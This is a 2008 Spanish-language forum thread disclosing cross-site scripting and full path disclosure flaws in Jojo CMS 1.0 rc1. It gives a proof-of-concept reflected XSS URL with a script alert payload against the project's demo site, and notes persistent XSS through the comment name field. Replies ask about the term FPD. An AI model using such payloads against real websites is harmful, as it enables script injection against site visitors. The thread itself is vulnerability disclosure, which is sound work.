Título: [UP] Jojo cms XSS y FPD Publicado por: s E t H en 12 Noviembre 2008, 20:56 pm es un cms que recien esta naciendo, pero como no me contestaron lo publico:
Nombre: Jojo cms Web: http://www.jojocms.org/ Version: 1.0 rc1 Reporte: http://bugs.jojocms.org/details/task134 Fecha de reporte: Wednesday, 05 November 2008, 12:52 UTC+13:00 Parcheado: no Tipo de vulnerabilidad: XSS y FPD Cross site scripting (non-persistent) and Full path disclosure: http://demo.jojocms.org/search/%3Cscript%3Ealert(%22wopa!%22)%3C/script%3E (http://demo.jojocms.org/search/%3Cscript%3Ealert(%22wopa!%22)%3C/script%3E) Cross site scripting (persistent): http://demo.jojocms.org/blog/1/welcome-to-jojocms/ (http://demo.jojocms.org/blog/1/welcome-to-jojocms/) HTTP HEADERS (I injected in 'name' variable): Código: POST /blog/1/welcome-to-jojocms/ HTTP/1.1 Código: <div class="comment" id="article-comment-wrap-2"> sorry, my english is not good :( Título: Re: [UP] Jojo cms XSS y FPD Publicado por: Eazy en 12 Noviembre 2008, 23:15 pm aham, y que es FPD?, Aparte esto no va en "Recopilacion de bugs de XSS/SQL i" ?
Título: Re: [UP] Jojo cms XSS y FPD Publicado por: s E t H en 13 Noviembre 2008, 00:20 am fpd: full path disclosure
no va en ese post, me fije y dice que para cms hay que abrir otro tema Título: Re: [UP] Jojo cms XSS y FPD Publicado por: Eazy en 19 Noviembre 2008, 19:38 pm Aguante sEtH =D, nice (No sabia las siglas FPD) =D
|